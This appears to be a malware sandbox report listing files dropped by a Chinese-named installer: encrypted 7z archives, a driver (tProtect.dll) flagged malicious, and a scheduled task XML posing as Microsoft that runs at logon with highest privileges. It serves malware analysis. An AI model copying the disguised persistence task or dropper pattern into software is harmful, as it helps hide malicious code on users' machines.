                                    Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..

                                    C:\Program Files (x86)\Windows NT\locale2.dat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):56546
                                    Entropy (8bit):7.996966859255979
                                    Encrypted:true
                                    SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                    MD5:4CB8B7E557C80FC7B014133AB834A042
                                    SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                    SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                    SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                    Malicious:false
                                    Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.

                                    C:\Program Files (x86)\Windows NT\locale3.bin

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):31890
                                    Entropy (8bit):7.99402458740637
                                    Encrypted:true
                                    SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                    MD5:8622FC7228777F64A47BD6C61478ADD9
                                    SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                    SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                    SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                    Malicious:false
                                    Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..

                                    C:\Program Files (x86)\Windows NT\locale3.dat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):31890
                                    Entropy (8bit):7.99402458740637
                                    Encrypted:true
                                    SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                    MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                    SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                    SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                    SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                                    Malicious:false
                                    Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.

                                    C:\Program Files (x86)\Windows NT\locale4.bin

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):74960
                                    Entropy (8bit):7.99759370165655
                                    Encrypted:true
                                    SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                                    MD5:950338D50B95A25F494EE74E97B7B7A9
                                    SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                                    SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                                    SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                                    Malicious:false
                                    Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...

                                    C:\Program Files (x86)\Windows NT\locale4.dat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):74960
                                    Entropy (8bit):7.997593701656546
                                    Encrypted:true
                                    SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                                    MD5:059BA7C31F3E227356CA5F29E4AA2508
                                    SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                                    SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                                    SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                                    Malicious:false
                                    Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.

                                    C:\Program Files (x86)\Windows NT\locale7.bin

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):29730
                                    Entropy (8bit):7.994290657653607
                                    Encrypted:true
                                    SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                                    MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                                    SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                                    SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                                    SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                                    Malicious:false
                                    Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                                    C:\Program Files (x86)\Windows NT\locale7.dat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):29730
                                    Entropy (8bit):7.994290657653608
                                    Encrypted:true
                                    SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                                    MD5:A9C8A3E00692F79E1BA9693003F85D18
                                    SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                                    SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                                    SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                                    Malicious:false
                                    Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                                    C:\Program Files (x86)\Windows NT\res.dat

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:7-zip archive data, version 0.4
                                    Category:dropped
                                    Size (bytes):2816881
                                    Entropy (8bit):7.999933043989351
                                    Encrypted:true
                                    SSDEEP:49152:yOsCcDPovazTSEONhiY3EB9Zw/rZjzW6LmjZhhBozUrI/KlN7qA1L6sXVq2:yOsnDP9TSEODiY0B9ZwjE79hvoo0/JsP
                                    MD5:F1ED3F0D0E4DF9EE652ED629BD74AE2C
                                    SHA1:E785AE1A0837E94A1F4E47D3056C0A0575226103
                                    SHA-256:B8DD3357EEEE78BE9BBDFD2BEEC42FDDCC49B540702A0E070A488822794D6418
                                    SHA-512:8C661532115DC86038EC1DE26D30E79125390F3D4E01FF516239E51EB2776E5FF739C790A6DA113AAD4BCEE72972EA0AC7C016D60FC55AE9A0B1B460624851D2
                                    Malicious:false
                                    Preview:7z..'.........*.....A.......Ntcz..o..N.2.+.Uc.(b.i.}...g......].a.*..(.D.P..|.....9N!g.C(.*......6[c.&...ns-.S:....8,c..).e9.@.z~f.._...2..-H..:......$.DF..|.."...v.)4d....b.I..Dn.^...H..3.q....AMN..?.j..0....X....g.|.C,.....b..j...B.6.<0.K.$.....a.@..g./_.gI..H/!"D?..N<.D..r$.8..... ........$s3...n....zY...o..A.....X+}........e{b.....qNx*..#.~.9.i.....x<..G.Aq|h....r..\.*..2H.D.c.]}..k..)+..%1.mL.J)..bT...cQ.<s.8.-._.]j.q.....7.Ww..FD..>.\..w..d7.4.w4..d997{".V...y....V..hC.....j.n.......q.......|..U.y.g%I.~.DhaA.....'.Z.~t.gg9.l#...R.i...O.J...(+.B]y\ui......St.@.".V.B..K.Z.P.f.4G.ob..m.E.6..O..3...'.'yAC.Ql......].!..'%}j..gUM:A.......0...-..WP..&j....."m...Q.NG@..d..d..p.K....(8..vh...fZr.j.q...&.O...G7..8...4$}w.w.|.'..1.C.QQ......<g:......i..^o..G.....'^....Jm[...c...Q.~.......y....n.........9,m0...<...9.............b}nx..(.TU7..O.}....T....$sd..c..[.....(."..yl.s...*......\Hw(.d.4P.((R)R....k......0.(a.5......):8...\.^...[."\F..P.....h..v

                                    C:\Program Files (x86)\Windows NT\tProtect.dll

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):63640
                                    Entropy (8bit):6.482810107683822
                                    Encrypted:false
                                    SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                                    MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                                    SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                                    SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                                    SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 9%
                                    • Antivirus: Virustotal, Detection: 6%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                                    C:\Program Files (x86)\Windows NT\task.xml

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:ASCII text
                                    Category:dropped
                                    Size (bytes):4096
                                    Entropy (8bit):3.3477819334971057
                                    Encrypted:false
                                    SSDEEP:48:dXKLzDln+L6w0QldOVQOj933ODOiTdKbKsz72eW+5yF:dXazDlnjwhldOVQOj6dKbKsz7
                                    MD5:925F146227EB8EB8FED35B78FFB7568D
                                    SHA1:7B70D313C0285134724718F231F68F3DEFFB79E9
                                    SHA-256:29CC7512B35855C6BC2699717A049E89521621852913893FA98B910273442FAB
                                    SHA-512:3C61A6AC158D2C600747490196D70BAE8087C7DB52257EB2A40F0D7F112E2F0EDE249C141C922B66AA811D95FC08441841D91A0E6A287874653664DAC7060F7E
                                    Malicious:false
                                    Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\turminoob</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetw

                                    C:\Program Files (x86)\Windows NT\trash

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2566738
                                    Entropy (8bit):7.99992559503684
                                    Encrypted:true
                                    SSDEEP:49152:ChxmtjEi7F1WpsGRApsU3euv0sSaXBNRqRNQ87FKbUOsXhiLrGb:ChAYi7FgXeKZuv9SSBNARNZ7FKbUNkab
                                    MD5:41B2FD0B3E8F7CF3438131D893FF0157
                                    SHA1:8D9B804D3E9AA5E1074921EC85CA2CC9B076E5B8
                                    SHA-256:A9C3F6D4CBABE7F6B758EDC7602BC413DB7D0DFC016827E89D6B60A2B5E4F207
                                    SHA-512:DEE2D2F7A5ABF9E20E6D9147BE9135968CC186F29A74755F6B690E55B4D91DD65902D7D1691B348E618DE72A31A140D451969CACC69E4ADF5269CD9495872857
                                    Malicious:false
                                    Preview:.8..i.&;r.....kK)MI...c....W..]....b-.a...9..z...y...~?t..u.*...P;.?.........,r..ks<......+Vva....).\Q..|'......`*c...j#.E.]..^..e..K.;UD...O...:..mM..\H.q6E&........W cb.].......GU..A..-. "....#....g.qa......bu...e..-}...........QWf..2.E.......(.:.......2b}....<.1.P......j.._;.Hz..s,.5...>.X..c..D..`>..h^ ...^.H.."..ec....2....`..$....p....M.t{..f.Z....E....M...HF.@.^.....g.B...?..gyg.5J.....4S.Yp.k.b...:-.(.z...h=.e..(..k..<4.M....Q%.wJ..\..t..gU%M./..#.....l..8/.:.....].b.6...}2...gK\.b<5.....eo%.E....I.q..].0.....]N..@.v....-1B_.p...8...I......d`.7y.S?.K?.+...p..k...E.*..../..n..k.Z[..p.0P.CUH.n....h..&...L...F..ZTV.........~...J......=. .S.....;.<.E..Q..W._.z@y.M.qW)...?....iO...t{..D_8...a....5..v-M.o.K.(`.i...o&.L+.P...A:0'.....c.V......,..LO.5/.....b{U.....!B,.TTt..j.M.`k2...Q.0.|.:.....Ia....f..e....=n....J..v.0.....7...j.o9.....p..5.l..y.=...o./........q....?...J?.4.kJsT#..e.|HM.....P..N............;P../.d.5..I..E./._...m.:..+.T.

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:NlllulDm0ll//Z:NllU6cl/
                                    MD5:DA1F22117B9766A1F0220503765A5BA5
                                    SHA1:D35597157EFE03AA1A88C1834DF8040B3DD3F3CB
                                    SHA-256:BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69
                                    SHA-512:520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9
                                    Malicious:false
                                    Preview:@...e.................................R..............@..........

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gnzh1bnl.n1h.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwf1xtsq.5nu.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jex452bm.j04.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jysm3pzy.uqw.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\is-08K47.tmp\_isetup\_setup64.tmp

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):6144
                                    Entropy (8bit):4.720366600008286
                                    Encrypted:false
                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                    Malicious:false
                                    Antivirus:
